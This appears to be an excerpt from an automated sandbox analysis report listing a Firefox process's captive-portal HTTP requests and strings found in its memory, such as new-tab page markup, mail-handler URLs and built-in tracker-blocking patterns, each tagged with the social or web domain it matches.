Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEDeferredTask@resource://gre/modules/DeferredTask.sys.mjs:117:18 equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEDeferredTask@resource://gre/modules/DeferredTask.sys.mjs:117:18 equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEDeferredTask@resource://gre/modules/DeferredTask.sys.mjs:117:18 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2481912376.0000027292816000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $key_openDownloadsdoff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon
Source: firefox.exe, 00000019.00000002.2481912376.0000027292816000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $key_openDownloadsdoff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://static.adsafeprotected.com/iasPET.1.js*://pagead2.googlesyndication.com/tag/js/gpt.js**://cdn.optimizely.com/public/*.js*://connect.facebook.net/*/sdk.js**://connect.facebook.net/*/all.js**://www.google-analytics.com/analytics.js**://cdn.adsafeprotected.com/iasPET.1.js*://*.moatads.com/*/moatheader.js**://js.maxmind.com/js/apis/geoip2/*/geoip2.js equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.rva311.com/static/js/main.*.chunk.jshttps://smartblock.firefox.etp/facebook.svg*://web-assets.toggl.com/app/assets/scripts/*.js*://track.adform.net/serving/scripts/trackpoint/*://trends.google.com/trends/embed* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2481912376.0000027292816000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2492921640.00000272932BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2407614644.000002729B680000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2482727507.0000027292903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2492921640.00000272932BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2407614644.000002729B680000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2482727507.0000027292903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2528820121.000002729497A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Got invalid request to save JSON dataresource://devtools/shared/security/socket.jsFailed to execute WebChannel callback:WebChannel/this._originCheckCallback@mozilla.org/uriloader/handler-service;1@mozilla.org/network/protocol;1?name=file^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?browser.fixup.domainsuffixwhitelist.devtools/client/framework/devtoolsdevtools.performance.recording.ui-base-urlJSON Viewer's onSave failed in startPersistence@mozilla.org/network/protocol;1?name=defaultDevTools telemetry entry point failed: browser.urlbar.dnsResolveFullyQualifiedNamesget FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPget FIXUP_FLAGS_MAKE_ALTERNATE_URIdevtools.performance.popup.feature-flagdevtools.debugger.remote-websocketDevToolsStartup.jsm:handleDebuggerFlagresource://devtools/server/devtools-server.js@mozilla.org/dom/slow-script-debug;1{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}No callback set for this channel.browser.fixup.dns_first_for_single_words^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)Failed to listen. Listener already attached.^([a-z+.-]+:\/{0,3})*([^\/@]+@).+^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$Unable to start devtools server on releaseDistinctSystemPrincipalLoaderFailed to listen. Callback argument missing.devtools/client/framework/devtools-browserget FIXUP_FLAG_FORCE_ALTERNATE_URIresource://gre/modules/ExtHandlerService.sys.mjshandlerSvc fillHandlerInfo: don't know this typeresource://gre/modules/URIFixup.sys.mjsresource://gre/modules/FileUtils.sys.mjs_injectDefaultProtocolHandlersIfNeededhttp://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://www.inbox.lv/rfc2368/?value=%s{33d75835-722f-42c0-89cc-44f328e56a86}https://mail.inbox.lv/compose?to=%shttp://poczta.interia.pl/mh/?mailto=%sextractScheme/fixupChangedProtocol<resource://gre/modules/JSONFile.sys.mjshttps://poczta.interia.pl/mh/?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s_finalizeInternal/this._finalizePromise<@mozilla.org/uriloader/web-handler-app;1Can't invoke URIFixup in the content processisDownloadsImprovementsAlreadyMigrated@mozilla.org/uriloader/local-handler-app;1@mozilla.org/network/file-input-stream;1resource://gre/modules/JSONFile.sys.mjs@mozilla.org/uriloader/dbus-handler-app;1{c6cf88b7-452e-47eb-bdc9-86e3561648ef}resource://gre/modules/NetUtil.sys.mjshttps://mail.yahoo.co.jp/compose/?To=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%sgecko.handlerService.defaultHandlersVersionresource://gre/modules/DeferredTask.sys.mjs_setUpMenulistPopup/</this._scrollTimer< equals www.yahoo.com (Yahoo)
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WebExtensionLangpackManifestWebExtensionDictionaryManifesthttps://www.google.com/searchnimbus-desktop-experiments^[a-z0-9-._]*@[a-z0-9-._]+$https://www.facebook.com/DEFAULT_REPLACEMENT_CHARACTERFirefoxSpecificPropertiesOptionalPermissionNoPrompt#kickOffAlternativeFrecencies equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2516262256.000002729480A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2516262256.000002729480A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2516262256.0000027294810000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2481912376.0000027292816000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 00000019.00000002.2481912376.0000027292816000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://www.inbox.lv/rfc2368/?value=%s equals www.yahoo.com (Yahoo)
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2492921640.00000272932BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2407614644.000002729B680000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2492921640.00000272932BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2407614644.000002729B680000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2482727507.0000027292903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
